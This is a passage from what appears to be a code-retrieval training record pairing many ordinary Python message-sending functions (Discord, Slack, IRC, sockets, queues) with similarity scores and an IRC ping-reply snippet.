self.message, properties)\n self._message_number += 1\n self._deliveries.append(self._message_number)\n self.logger.info('published message # %i', self._message_number)", "def send_message(self, to, subject, body):\n self.forum.send_message(self.game, Message(to=to, subject=subject, body=body))", "def _send(self, command, payload):\n self.work_queue_client.send(command, payload)", "async def send_msg(self, msg):\n try:\n logging.info(\"Sending: %s\", msg)\n self.writer.write(msg.encode())\n await self.writer.drain()\n\n except Exception as e:\n logging.error(\"Command could not be encoded; %s\", e)", "def send(msg, dest=None):", "async def channel(self, ctx, channel: discord.TextChannel):\r\n server = ctx.guild\r\n self._logs[str(server.id)][\"channel\"] = str(channel.id)\r\n dataIO.save_json(self._logs_file, self._logs)\r\n await ctx.send(f\"<#{str(channel.id)}> has been set as the modlog channel {self.bot.get_emoji(470063310386233344)}\")", "def send_message(self, message):\n self.print_debug_message(message)\n self.socket.send(message)", "def send(event):\n\n\tid = get_hostname()\n\n\tmessage = str(id) + \"|\" + str(event)\n\n\tif mq is None: # if no mq exists\n\t\tprint \"mq is None\"\n\n\telse: # if mq exists\n\t\ttry:\n\n\t\t\tmq.send(message)\n\t\t\tprint 'completed sending message'\n\n\t\texcept Exception as e:\n\n\t\t\tprint 'failed to send message: {}'.format(e)", "def send(message):\n\tmessage = message.encode()\n\tconn.send(message)", "def send_msg (chan, msg):\n\n if not os.path.isdir(tq_dir):\n os.mkdir(tq_dir)\n if not os.path.isdir(rq_dir):\n os.mkdir(rq_dir)\n\n t = datetime.datetime.now()\n fname = tq_dir + '/' + t.strftime(\"%y%m%d.%H%M%S.%f\")[:17]\n\n try:\n f = open(fname, 'w')\n except:\n print (\"Failed to open \" + fname + \" for write\")\n else:\n if chan > 0:\n f.write('[' + str(chan) + '] ' + msg + '\\n')\n else:\n f.write(msg + '\\n')\n f.close()\n time.sleep (0.005)\t# Ensure unique names", "async def send_wrapped_message(channel, message):\n for part in wrap(message, 2000):\n await channel.send(part)", "async def admin_msg(self, message):\n for channel in self.admin_channels.values():\n if channel:\n await channel.send(message)", "def send_and_flush(self, msg):\r\n try:\r\n self.bus.send(msg)\r\n msg.data[:4] = bytearray(4)\r\n # print(\"Message sent on {}\".format(self.bus.channel_info))\r\n except can.CanError:\r\n print(\"Message NOT sent\")", "async def say(self, *, channel_id, text=None, attachments=None, message_type=None):\n self.messages.append(\"{} {} {} {}\".format(channel_id, text, attachments, message_type))", "async def send(self, channel, content=MISSING, *, tts=False, embed=MISSING, embeds=MISSING, file=MISSING, \n files=MISSING, delete_after=MISSING, nonce=MISSING, allowed_mentions=MISSING, reference=MISSING, \n mention_author=MISSING, components=MISSING) -> Message:\n\n if type(channel) not in [discord.TextChannel, int, str]:\n raise discord.InvalidArgument(\"Channel must be of type discord.TextChannel\")\n\n channel_id = channel.id if type(channel) is discord.TextChannel else channel\n payload = jsonifyMessage(content=content, tts=tts, embed=embed, embeds=embeds, nonce=nonce, allowed_mentions=allowed_mentions, reference=reference, mention_author=mention_author, components=components)\n\n route = BetterRoute(\"POST\", f\"/channels/{channel_id}/messages\")\n\n r = None\n if file is MISSING and files is MISSING:\n r = await self._discord.http.request(route, json=payload)\n else:\n r = await send_files(route, files=files or [file], 
payload=payload, http=self._discord.http)\n\n msg = Message(state=self._discord._get_state(), channel=channel, data=r)\n \n if delete_after is not None:\n await msg.delete(delay=delete_after)\n \n return msg", "def send_message(\n self, text=None, blocks=None, attachments=None,\n timestamp=None, channel_name=None, channel_id=None):\n if not channel_id:\n channel_id = self.find_channel_id(channel_name)\n\n response = self.client.api_call(\n ''.join(\n [\n f'chat.postMessage?as_user={cfg.POST[\"as_user\"]}&channel={channel_id}&',\n f'thread_ts={timestamp}&' if timestamp else '',\n f'text={text}&' if text else '',\n f'blocks={blocks}&' if blocks else '',\n f'attachments={attachments}' if attachments else ''\n ]\n )\n )\n assert response['ok']\n return response", "def send_join(self, channel, key: str = None) -> None:\n\n if key:\n self.send_line('JOIN {} {}'.format(channel, key))\n else:\n self.send_line('JOIN {}'.format(channel))", "def send(self, message):\n\t\tmessage_string = self.send_address + \" \" + message + \" /\"\n\t\tself.add_to_queue(message_string)", "async def greeter_channel(self, ctx, *, channel: discord.TextChannel):\n await queries.update_setting(ctx, \"greeter_settings\", \"channel_id\", channel.id)\n await util.send_success(ctx, f\"Greeter channel is now {channel.mention}\")", "def send(self, event, message):\n pass", "def _set_channel_(self, channel):\n self._channel = channel", "def set_channel(cls, channel):\n cls.channel = channel", "def send(self, msg, flags=0, copy=True, track=False, **kwargs):\n kwargs['flags'] = flags\n kwargs['copy'] = copy\n kwargs['track'] = track\n kwargs.update(dict(flags=flags, copy=copy, track=track))\n return self._add_send_event('send', msg=msg, kwargs=kwargs)", "def sendMessage(self, msg):\n # Socket Object\n self.sock.connect((self.host, self.port))\n self.sock.send(msg)\n self.sock.close()", "def Talk(self, topic, message):\n Send(self.channel, topic, message)", "def send_action(self, *args, **kwargs):\n return self.bot.send_chat_action(self.id, *args, **kwargs)" ]
[ "0.82728493", "0.7965429", "0.7865041", "0.77663475", "0.7414901", "0.7366934", "0.7189363", "0.71749264", "0.7114904", "0.7107324", "0.7078955", "0.703922", "0.69624746", "0.6917826", "0.69085354", "0.6878344", "0.6788846", "0.67383105", "0.6678887", "0.66784793", "0.6666718", "0.666005", "0.66482", "0.65967906", "0.6590462", "0.65805084", "0.6574554", "0.65732616", "0.6537522", "0.6528824", "0.6525533", "0.6501931", "0.6491399", "0.649126", "0.6490304", "0.64792514", "0.6475098", "0.6454431", "0.64313054", "0.64122635", "0.64111674", "0.6397902", "0.6392922", "0.63803154", "0.63731956", "0.63710093", "0.6366678", "0.6363042", "0.63618827", "0.63591814", "0.6357972", "0.6350768", "0.6332581", "0.6327569", "0.632747", "0.63253933", "0.632055", "0.63032377", "0.62983006", "0.6295648", "0.6289282", "0.62750643", "0.62750643", "0.62750643", "0.6270424", "0.625059", "0.6245597", "0.62338686", "0.6232558", "0.62238216", "0.621242", "0.61997104", "0.6188319", "0.61802137", "0.61745924", "0.61636615", "0.6160488", "0.6149533", "0.6147559", "0.61407614", "0.61391175", "0.613621", "0.6117985", "0.6098337", "0.60945904", "0.60877013", "0.60856503", "0.6083368", "0.60784334", "0.6077781", "0.60654414", "0.6063429", "0.60627174", "0.60627073", "0.6062263", "0.605739", "0.60569596", "0.6054742", "0.60488814", "0.6043944", "0.60410273" ]
0.0
-1
Respond to server Pings.
def ping(msg):
    msg = msg[0:1] + 'O' + msg[2:]
    ircsocket.send(bytes(msg, 'utf-8'))
    sendmsg('This message should be eaten by irc. QQ.')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ping_response():\n\n return Response(\"ok\", status=200)", "def ping(self) -> Response:\n raise NotImplementedError", "def ping():\n\treturn HTTPResponse(status=200)", "def ping():\r\n return make_response(\"pong!\", 200)", "def ping():\n return jsonify({'response': 'pong'}), 200", "async def _ping_(self)->str:\n return PING_RESPONSE", "def ping():\n logging.info(\"Ping received...\")\n\n health = Predictor.load() is not None\n\n status = 200 if health else 404\n return Response(response=\"\\n\", status=status, mimetype=\"application/json\")", "def ping():\n return ping_response()", "def ping():\n return ping_response()", "def ping():\n return ping_response()", "def ping():\n return ping_response()", "def ping():\n requestor = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)\n logger.info(f\"Health check requested by ip='{requestor}'\")\n return make_response(\n jsonify(status=\"Serving\",\n body=\"pong\"), 200)", "def ping(self):\n d = self.replyQueue.get_ping()\n packet = RequestPing(self.charset, self.errors)\n self.transport.write(bytes(packet))\n return d.addCallback(self.handle_reply, self.charset, self.errors, None)", "def HandlePingRequest(self, request, response):\n self._publish_helper.HandlePingRequest(request, response)", "def ping(self):\n request = Empty()\n response = self.stub.Ping(request, timeout=5)", "def ping():\n health = ScoringService.get_model() is not None # You can insert a health check here\n\n status = 200 if health else 404\n return flask.Response(response='\\n', status=status, mimetype='application/json')", "async def ping(self):\n uri = \"/fapi/v1/ping\"\n success, error = await self.request(\"GET\", uri)\n return success, error", "async def ping(self) -> APIReturn:\n return await self._request(\"GET\", \"/ping\")", "def ping(self):\n self.connect()\n self._write('PING\\r\\n')\n return self._get_simple_response()", "def run(self):\r\n print \"*Ping* We've got a message!\"\r\n # Handle DNS request\r\n resolver = Resolver(self.caching, self.ttl)\r\n aliasRecords = []\r\n addressRecords = []\r\n # Read and resolve the questions one-by-one\r\n questions = self.request.questions\r\n for question in questions:\r\n hostname = question.qname\r\n (hostname, aliases, addresses) = resolver.gethostbyname(hostname)\r\n \r\n for alias in aliases:\r\n aliasData = dns.resource.RecordData.create(Type.CNAME, alias)\r\n aliasRecord = dns.resource.ResourceRecord(hostname, Type.CNAME, Class.IN, 9001, aliasData) # TODO fix ttl\r\n aliasRecords.append(aliasRecord)\r\n for address in addresses:\r\n addressData = dns.resource.RecordData.create(Type.A, address)\r\n addressRecord = dns.resource.ResourceRecord(hostname, Type.A, Class.IN, 9001, addressData)\r\n addressRecords.append(addressRecord)\r\n \r\n # Crafting of the response\r\n respHeader = self.request.header\r\n respHeader.qr = 1\r\n respHeader.qd_count = 0\r\n respHeader.an_count = 1\r\n \r\n respMessage = dns.message.Message(respHeader, [], addressRecords + aliasRecords, [], [])\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n respMessageByte = respMessage.to_bytes()\r\n sock.sendto(respMessageByte, self.clientAddr)\r\n print \"Ended request: \" + hostname\r\n sock.close()", "def Ping(self, request, _):\n\n return server_pb2.PingReply(data=request.data)", "def ping(self):\n response = self._request(\"GET\", [ROUTE_PING])\n\n if response.status_code == 200:\n logging.info(\"OK\")\n return True\n logging.error(\"FAILED\")\n return False", "async def ping(request):\n return 
web.json_response({'ping': 'pong'})", "def test_ping(self):\n response = self.app.get('/ping')\n\n assert response.status_code == 200\n assert response.data == b\"pong\"", "def ping(event, context):\n logger.info(\"Ping requested.\")\n return _get_response(200, \"PONG!\")", "def ping():\n return json_response({\n 'ping': 'pong',\n 'version': __version__,\n 'imgapi': False,\n })", "def sendPing(self, payload=None):", "def ping(self):\n self._write(f'PING :{self.server.name}')\n self.awaiting_pong_since = datetime.datetime.now()", "def ping(self):\n\n rlog(1, self.name, 'sending ping')\n try:\n self.putonqueue(1, 'PING :%s' % self.server)\n return 1\n except Exception, ex:\n rlog(10, self.name, \"can't send ping: %s\" % str(ex))\n return 0", "def ping(self):\n try:\n api_ping = '{}://{}:{}/api/1.0.0/ping/{}/None'.format(\n self._env.api_protocol,\n self._env.api_host,\n self._env.api_port,\n self._key\n )\n self._env.logger.info('PING> {}'.format(api_ping))\n\n def check(response):\n if response.code == 204:\n self._env.logger.info('204 - Registering new routes')\n self.register_routes()\n elif response.code == 404:\n self._env.logger.info('404 - api gateway is not available')\n elif response.code != 200:\n self._env.logger.error('{} - UNKNOWN ERROR'.format(response.code))\n return response\n\n def log(failure):\n \"\"\"\n Just log the error, a return code of 'False' will be returned elsewhere\n :param failure: A treq failure object\n \"\"\"\n return self._env.logger.warning('[ping] {}'.format(failure.getErrorMessage()))\n\n treq.get(api_ping).addCallback(check).addErrback(log)\n\n except requests.exceptions.ConnectionError as e:\n self._env.logger.warning('ping failed for \"{}\"'.format(api_ping))\n self._env.logger.warning('ping return = \"{}\"'.format(e.args[0].reason))\n self._state = False", "def ping(self):\n pass", "def ping():\r\n health1 = ScoringService.get_model1() is not None # You can insert a health check here\r\n ping_response = \"Docker for Discover non prime users\"\r\n status = 200 if (health1) else 404\r\n return flask.Response(response=ping_response, status=status, mimetype='application/json')", "def ping(self):\n\n url = self.api_url('ping')\n\n return requests.get(url, headers=self.auth_header).json()", "def ping(request: Request):\n client_host = request.client.host\n return {\"payload\": \"Hello, v1.0.1\", \"client\": client_host}", "def ping(self):\n return (200 == self.client.head(self.name).getStatusCode())", "def adc_api_ping():\n return jsonify({\"status\": \"OK\"})", "def serve_response(self):\n try:\n print self.path\n response_info = self.responses_qeues[self.path.split(\"?\").pop(0)].pop(0)\n print response_info\n except:\n self.send_response(404)\n self.end_headers()\n return\n\n \"\"\"If response_info has also a delay set, wait the time specified.\"\"\"\n if \"delay\" in response_info:\n time.sleep(response_info[\"delay\"])\n\n \"\"\"Send the status code.\"\"\"\n status_code = response_info[\"status_code\"]\n self.send_response(status_code)\n\n \"\"\"Send specific headers, if any.\"\"\"\n if \"headers\" in response_info:\n headers = response_info[\"headers\"]\n for header_name in headers.keys():\n self.send_header(header_name, headers.get(header_name))\n self.end_headers()\n\n \"\"\"Send the body, if any.\"\"\"\n if \"body\" in response_info:\n body = response_info[\"body\"]\n self.wfile.write(json.dumps(body))", "def onPing(self, payload):", "async def do_ping(self):\n return self._result(\"pong\")", "def ping(self) -> None:\n ...", "def ping(self):\n 
return", "def ping(self):\n\t\treturn self._send_command_to_entity_server(us.SERVER_COMMAND_PING)", "def ping():\n return '{}'", "def Ping(self):\n\n self.helpers(self.config).Info(\"Ping Weaviate...\")\n # get the meta endpoint\n _, _ = self.Get(\"/meta\")\n # would fail is not available.\n self.helpers(self.config).Info(\"Pong from Weaviate...\")", "def server_ping(self):\n \n if not hasattr(self,\"ping_data\"):\n #need to include a list called ping_data - which is updated as needed. by \"ping_data fnctions in objects of the server.\n #Nmaely this includes a list of instruments that are attached to the server.\n self.ping_data={\"server_id\":self.id,\n \"server_name\":self.name,\n \"server_ip\":self.ip,\n \"server_port\":str(wsport),\n \"server_id_node\":self.id_node,\n \"server_ping\":\"ping!\"}\n self.ping_data.update({\"server_time\":time.time()})\n self.multicast.protocol.send(simplejson.dumps(self.ping_data))\n server_command = commands.ServerCommand(self.server, self.server_ping)\n reactor.callLater(self.server_ping_period,\n self.command_queue.add,\n server_command)", "def ping() -> str:\n return \"Server is here\"", "def do_GET(self):\n if not self.path.endswith(\"/\"): self.path += \"/\"\n if self.path == \"/ping/\":\n msg = \"pong\".encode(\"UTF-8\")\n\n self.send_response(HTTPStatus.OK)\n self.send_header(\"Content-Type\", \"text/application\")\n self.send_header(\"Content-Length\", len(msg))\n self.end_headers()\n self.wfile.write(msg)\n else:\n self.send_response(HTTPStatus.BAD_REQUEST)\n self.end_headers()", "def send_pings(self, interval):\n for client in list(self.clients.values()):\n t = client._transport\n if client.ident.registered:\n since = client.awaiting_pong_since\n if not since:\n client.ping()\n else:\n self.check_timeout(t, since, interval, 'Ping timeout')\n else:\n self.check_timeout(t, client.connected_at, interval, 'Connection timed out')", "def ping(self,dest):\n\t\tself.tn.write('ping -c 4 %s\\n'%(dest))\n\t\tself.tn.write('exit\\n')\n\t\tresp = self.tn.read_all()\n\t\treturn resp", "async def ping(self, *args, **kwargs):\n\n return await self._makeApiCall(self.funcinfo[\"ping\"], *args, **kwargs)", "def Ping(self): # real signature unknown; restored from __doc__\n pass", "def Ping(self, request, _):\n\n return notifier_pb2.PingReply(data=request.data)", "def test_ping(self):\n response = self.client.get(reverse(\"api_hello:ping\"))\n self.assertTrue(response.json()[\"status\"])", "def send_ping(self, seq_num):\n # Create a client socket, bind to random port, and set timeout of sock\n client_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n rand_port = random.randint(1024, 65535)\n host = socket.gethostbyname(socket.gethostname())\n client_sock.bind((host, rand_port))\n client_sock.settimeout(self.timeout)\n\n # If first request, print relevant message\n if seq_num == 1:\n print(f'PING {self.server_ip}')\n # Try - send ping request to server\n try:\n # build request message\n request_msg = self.build_message(seq_num)\n\n # Mark start time for calculating request message rtt (ms)\n start_time = time.time() * 1000\n # Send echo request message to server and receive any reply\n client_sock.sendto(request_msg, (self.server_ip, self.server_port))\n data, address = client_sock.recvfrom(2048)\n # Mark end time for calculating rtt (ms)\n end_time = time.time() * 1000\n\n # Add rtt to list of rtts\n rtt = int(end_time - start_time)\n self.rtt_list.append(rtt)\n # Increment request count since transmitted another message\n self.request_count += 1\n\n # 
Calculate checksum from server\n server_checksum = self.calculate_checksum(data)\n # Grab sequence number from reply message\n server_seq_num = int.from_bytes(data[6:8], byteorder='big')\n\n # If checksum from server reply is invalid, print error message\n # (invalid if sum of headers not = 65535 (all 1's in binary))\n if server_checksum != 65535:\n print(f'WARNING: checksum verification failure for echo reply '\n f'seqno={str(server_seq_num)}')\n # Otherwise print PONG\n else:\n print(f'PONG {self.server_ip}: seq={str(server_seq_num)} '\n f'time={rtt} ms')\n # Successfully received a reply\n self.reply_count += 1\n client_sock.close()\n\n # If have timeout exception, count as dropped\n except socket.timeout:\n self.request_count += 1\n client_sock.close()", "def rpc_ping(self):\n\t\treturn True", "def ping(self) -> bool:\n # consider 200 to be successful\n response = self.shards_response(\"ping\")\n return response.status_code == 200", "def ping():\n health = (\n ScoringService.get_predictor_model() is not None\n ) # You can insert a health check here\n\n status = 200 if health else 404\n return flask.Response(response=\"\\n\", status=status, mimetype=\"application/json\")", "def test_api_ping_success(self):\r\n res = self.testapp.get('/api/v1/admin/ping?api_key=' + API_KEY,\r\n status=200)\r\n ping = json.loads(res.body)\r\n\r\n self.assertTrue(ping['success'])\r\n\r\n self._check_cors_headers(res)", "async def handle_ping(request):\n return web.Response(text=f\"OK {datetime.now().isoformat()}\\n\", headers={'Content-Type': 'text/event-stream'})", "def ping(self,\n *opts, # type: PingOptions\n **kwargs # type: Any\n ) -> PingResult:\n return super().ping(*opts, **kwargs)", "def handle_ping(self, host):\n self.send(\"PONG :{}\".format(host))", "def ping(self, *args):\n return self._command(b'PING', *args, handler=\"PONG\")", "def get(self):\n resp = jsonify({\"response\": 'Pong!'})\n return resp", "def ping(self):\n return rpc.ping(self.service, self.session_handle)", "async def ping(self, ctx):\n await ctx.send('pong')", "def ping_view(request, pk):\n service = get_object_or_404(ServiceModel, pk=pk)\n service.ping(force_ping=True)\n return redirect(reverse('services:index'))", "async def ping(self,\n wait_for_response=True,\n reset_inactivity_timeout=True,\n response_timeout_in_seconds=None):\n command = _create_ping_command(self._get_and_increment_command_sequence_number(),\n wait_for_response=wait_for_response,\n reset_inactivity_timeout=reset_inactivity_timeout)\n\n await self._send_command(command,\n response_timeout_in_seconds)", "def ping(self):\n return True", "def ping(self):\n return True", "def ping(self):\n packet = Packet()\n packet.message = MessageType.CLIENT_PING\n packet.data = \"PING\"\n try:\n self.send(packet.encode())\n self.last_ping_time = time.time()\n except socket.error, e:\n self.console.error(repr(e))", "def ping(self):\n return self.hub.ping()", "def ping(request):\r\n rdict = request.matchdict\r\n params = request.params\r\n username = rdict.get('username', None)\r\n api_key = params.get('api_key', None)\r\n user = UserMgr.get(username=username)\r\n # Check if user provided the correct api_key\r\n if api_key == user.api_key:\r\n return _api_response(request, {\r\n 'success': True,\r\n 'message': 'Looks good'\r\n })\r\n else:\r\n return _api_response(request, {\r\n 'success': False,\r\n 'message': 'API key is invalid.'\r\n })", "def respond(self, resp):\n self.push(resp + '\\r\\n')\n self.logline('==> %s' % resp)", "async def rpc_ping(self, request: 
dht_pb2.PingRequest, context: P2PContext) -> dht_pb2.PingResponse:\n\n response = dht_pb2.PingResponse(peer=self.node_info, dht_time=get_dht_time(), available=False)\n\n if request.peer and request.peer.node_id:\n sender_id = DHTID.from_bytes(request.peer.node_id)\n sender_peer_id = context.remote_id\n\n if request.validate:\n response.available = await self.call_ping(sender_peer_id, validate=False) == sender_id\n\n asyncio.create_task(\n self.update_routing_table(\n sender_id, sender_peer_id, responded=response.available or not request.validate\n )\n )\n\n return response", "def ping(self):\n if not self.proxy:\n self.proxy = self.session.service(\"ALExpressiveListening\")\n return self.proxy.ping()", "def ping(self):\n return 'ping'", "def sendPing(server):\n server_status = None\n \n # build the url\n url = 'http://{0}'.format(server)\n # send the ping via HTTP\n try:\n health = requests.get(url)\n except requests.ConnectionError:\n return 'Offline'\n # depending on the health of the system, respond accordingly\n if health.ok:\n server_status = 'Online'\n else:\n server_status = 'Offline'\n \n return server_status", "def _send_pong(self):\r\n self._send(\"PONG\")", "def test_ping(self):\r\n\r\n # Access the service status page, which starts a delayed\r\n # asynchronous task\r\n response = self.client.get(self.ping_url)\r\n\r\n # HTTP response should be successful\r\n self.assertEqual(response.status_code, 200)\r\n\r\n # Expect to get a JSON-serialized dict with\r\n # task and time information\r\n result_dict = json.loads(response.content)\r\n\r\n # Was it successful?\r\n self.assertTrue(result_dict['success'])\r\n\r\n # We should get a \"pong\" message back\r\n self.assertEqual(result_dict['value'], \"pong\")\r\n\r\n # We don't know the other dict values exactly,\r\n # but we can assert that they take the right form\r\n self.assertIsInstance(result_dict['task_id'], unicode)\r\n self.assertIsInstance(result_dict['time'], float)\r\n self.assertTrue(result_dict['time'] > 0.0)", "def get(self):\n\n # Return a plain text response\n return self.plain_text_response(\"Alive!\", 200)", "async def ping(self, ctx : commands.Context) -> None:\n\n embed = Embed(\n title = \"🏓 Pong!\",\n description = f\"Gateway latency is {int(round(self.bot.latency * 1000, 2))}ms.\",\n color = maincolor\n )\n await ctx.send(embed = embed)", "def ping(self, handler=\"admin/ping\", **kwargs):\n params = kwargs\n params_encoded = safe_urlencode(params, True)\n\n if len(params_encoded) < 1024:\n # Typical case.\n path = \"%s/?%s\" % (handler, params_encoded)\n return self._send_request(\"get\", path)\n else:\n # Handles very long queries by submitting as a POST.\n path = \"%s/\" % handler\n headers = {\n \"Content-type\": \"application/x-www-form-urlencoded; charset=utf-8\"\n }\n return self._send_request(\n \"post\", path, body=params_encoded, headers=headers\n )", "async def ping(self, ctx):\r\n embed = discord.Embed(\r\n title = \"Ping\",\r\n description = \"Pinging...\",\r\n color = Config.MAINCOLOR\r\n )\r\n t1 = time.perf_counter()\r\n msg = await ctx.send(embed = embed)\r\n t2 = time.perf_counter()\r\n embed = discord.Embed(\r\n title = \"🏓 Pong!\",\r\n description = f\"API latency is {round((t2 - t1) * 1000)}ms\\nHost latency is {round(self.bot.latency * 1000, 2)}ms\",\r\n color = Config.MAINCOLOR\r\n )\r\n await msg.edit(embed = embed)", "async def ping(self, ctx):\n self.log_command_call(\"ping\", ctx.message)\n embed_output = create_embed(description=\"pong\")\n await ctx.send(embed=embed_output)", "def 
test_ping(self):\n\n # Access the service status page, which starts a delayed\n # asynchronous task\n response = self.client.get(self.ping_url)\n\n # HTTP response should be successful\n assert response.status_code == 200\n\n # Expect to get a JSON-serialized dict with\n # task and time information\n result_dict = json.loads(response.content.decode('utf-8'))\n\n # Was it successful?\n assert result_dict['success']\n\n # We should get a \"pong\" message back\n assert result_dict['value'] == 'pong'\n\n # We don't know the other dict values exactly,\n # but we can assert that they take the right form\n assert isinstance(result_dict['task_id'], str)\n assert isinstance(result_dict['time'], float)\n assert result_dict['time'] > 0.0", "def ping():\n return 'pong'", "async def connections_send_ping(request: web.BaseRequest):\n context: AdminRequestContext = request[\"context\"]\n connection_id = request.match_info[\"conn_id\"]\n outbound_handler = request[\"outbound_message_router\"]\n body = await request.json()\n comment = body.get(\"comment\")\n\n try:\n async with context.profile.session() as session:\n connection = await ConnRecord.retrieve_by_id(session, connection_id)\n except StorageNotFoundError as err:\n raise web.HTTPNotFound(reason=err.roll_up) from err\n\n if not connection.is_ready:\n raise web.HTTPBadRequest(reason=f\"Connection {connection_id} not ready\")\n\n msg = Ping(comment=comment)\n await outbound_handler(msg, connection_id=connection_id)\n\n return web.json_response({\"thread_id\": msg._thread_id})", "def ping(self):\n return self._samp_hub.ping()", "def ping(self, cmd):\n cmd.finish(\"text='Present and (probably) well'\")", "async def ping(self, ctx:utils.Context):\r\n\r\n await ctx.send(\"Pong!\")", "def PingPong(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def PingPong(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def ping(self):\r\n start = time.time()\r\n response = self.get(\"ping\")\r\n duration = (time.time() - start) * 1000\r\n assert response == \"pong\"\r\n return duration", "async def ping(ctx):\n latencies = {\n \"websocket\": bot.latency,\n }\n\n def comp_message():\n msgs = []\n for title in latencies:\n msgs.append(f\"{title.title()}: {(latencies[title] * 1000):.0f}ms\")\n return '\\n'.join(msgs)\n\n start = time.perf_counter()\n await ctx.respond(comp_message())\n end = time.perf_counter()\n\n latencies[\"round trip\"] = end - start\n\n await ctx.edit(content=comp_message())", "async def ping(self, ctx):\n await ctx.send(\"Pong\")", "def run(self):\n for req, resp in self.servings:\n resp.check_timeout()", "def ping(self, cmd):\n\n cmd.finish(\"text='Present and (probably) well'\")", "def _ping_pando(self):\n try:\n requests.head('https://pando-rgw01.chpc.utah.edu/')\n except:\n print('🤝🏻⛔ Bad handshake with pando? Am I able to move on?')\n pass", "def ping():\n return json.loads('{\"message\": \"pong\", \"success\": true}')", "def send_resp(self):\n self.n_send_resp += 1", "def _send_and_response(self, addr, msg):\n self._namefixer(msg)\n return send_and_receive(addr, msg, 30) # manual timeout !!!!! fix it!" ]
[ "0.71649414", "0.7104726", "0.6999726", "0.69393915", "0.68687826", "0.67558753", "0.6743167", "0.6712012", "0.6712012", "0.6712012", "0.6712012", "0.6609778", "0.6493357", "0.6481408", "0.64656126", "0.63697636", "0.63491356", "0.634054", "0.6311246", "0.62131786", "0.6207986", "0.61707705", "0.61617047", "0.6136859", "0.61089426", "0.6092898", "0.6054629", "0.6032496", "0.6025239", "0.6021959", "0.59523267", "0.5924403", "0.58970237", "0.58842784", "0.5882918", "0.5872278", "0.5857753", "0.5850697", "0.5835816", "0.5832574", "0.58303183", "0.58257324", "0.5818586", "0.58169657", "0.57937187", "0.57918316", "0.57816637", "0.5769176", "0.57564133", "0.5753047", "0.5752077", "0.5740146", "0.57265323", "0.57241195", "0.57191336", "0.5710592", "0.5695972", "0.56933975", "0.56488246", "0.56402665", "0.5629598", "0.5612771", "0.56008875", "0.5594617", "0.5561108", "0.5552428", "0.55392337", "0.55206704", "0.55206704", "0.54881626", "0.5486906", "0.54852444", "0.5474517", "0.5473649", "0.54722583", "0.5471757", "0.547047", "0.5468718", "0.545422", "0.54269224", "0.5418201", "0.5412728", "0.5408598", "0.54030234", "0.539439", "0.53825605", "0.5364557", "0.53483653", "0.5342445", "0.5332628", "0.53278726", "0.53278726", "0.5318", "0.5313772", "0.5309468", "0.53079367", "0.5304919", "0.5304505", "0.5293093", "0.52909833", "0.52879846" ]
0.0
-1
Wrapper around the MappingColumns class to create the list of suggested mappings
def build_column_mapping(raw_columns, dest_columns, previous_mapping=None, map_args=None, default_mappings=None, thresh=0):
    return MappingColumns(raw_columns, dest_columns, previous_mapping=previous_mapping, map_args=map_args,
                          default_mappings=default_mappings, threshold=thresh).final_mappings
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_column_mapping_suggestions(request):\n body = json.loads(request.body)\n import_file = ImportFile.objects.get(pk=body.get('import_file_id'))\n org_id = body.get('org_id')\n result = {'status': 'success'}\n # Make a dictionary of the column names and their respective types.\n # Build this dictionary from BEDES fields (the null organization columns,\n # and all of the column mappings that this organization has previously\n # saved.\n field_mappings = get_mappable_types()\n field_names = field_mappings.keys()\n column_types = {}\n for c in Column.objects.filter(\n Q(mapped_mappings__super_organization=org_id) |\n Q(organization__isnull=True)\n ).exclude(\n # mappings get created to mappable types\n # but we deal with them manually so don't\n # include them here\n column_name__in=field_names\n ):\n if c.unit:\n unit = c.unit.get_unit_type_display()\n else:\n unit = 'string'\n if c.schemas.first():\n schema = c.schemas.first().name\n else:\n schema = ''\n column_types[c.column_name] = {\n 'unit_type': unit.lower(),\n 'schema': schema,\n }\n\n building_columns = sorted(column_types.keys())\n db_columns = sorted(field_names)\n building_columns = db_columns + building_columns\n\n db_columns = get_mappable_types()\n for k, v in db_columns.items():\n db_columns[k] = {\n 'unit_type': v if v else 'string',\n 'schema': 'BEDES',\n }\n column_types.update(db_columns)\n\n suggested_mappings = mapper.build_column_mapping(\n import_file.first_row_columns,\n column_types.keys(),\n previous_mapping=get_column_mapping,\n map_args=[import_file.import_record.super_organization],\n thresh=20 # percentage match we require\n )\n\n for m in suggested_mappings:\n dest, conf = suggested_mappings[m]\n if dest is None:\n suggested_mappings[m][0] = u''\n\n result['suggested_column_mappings'] = suggested_mappings\n result['building_columns'] = building_columns\n result['building_column_types'] = column_types\n\n return result", "def __get_column_mapping(self):\n\n s1 = list(Sample(\"FL\", \"M1.0@265_Primary_ar115_s2010-08-06T06_36_00_e2010-08-06T18_24_00.csv\").get_data().columns)[:25]\n column_mapping = {}\n for i in range(len(s1)):\n column_mapping[i] = s1[i]\n\n return column_mapping", "def get_column_mappings(organization):\n column_mappings = ColumnMapping.objects.filter(\n super_organization=organization\n )\n mapping = {}\n for cm in column_mappings:\n # What in the world is this doings? 
-- explanation please\n if not cm.column_mapped.all().exists():\n continue\n\n key = cm.column_raw.all().values_list('table_name', 'column_name')\n value = cm.column_mapped.all().values_list('table_name', 'column_name')\n\n if len(key) != 1:\n raise Exception(\"There is either none or more than one mapping raw column\")\n\n if len(value) != 1:\n raise Exception(\"There is either none or more than one mapping dest column\")\n\n key = key[0]\n value = value[0]\n\n # These should be lists of one element each.\n mapping[key[1]] = value\n\n # _log.debug(\"Mappings from get_column_mappings is: {}\".format(mapping))\n return mapping, []", "def _get_columns_mapping_dict():\n\n columns_mapping_dict = {}\n for original_header in COLUMN_HEADERS_MAPPER:\n new_header = COLUMN_HEADERS_MAPPER[original_header]\n columns_mapping_dict[new_header] = [original_header]\n return columns_mapping_dict", "def label_columns(mapping):\n columns = []\n for name, column in mapping.items():\n columns.append(column.label(name))\n return columns", "def create_mappings(mappings, organization, user, import_file_id=None):\n\n # initialize a cache to store the mappings\n cache_column_mapping = []\n\n # Take the existing object and return the same object with the db column objects added to\n # the dictionary (to_column_object and from_column_object)\n mappings = Column._column_fields_to_columns(mappings, 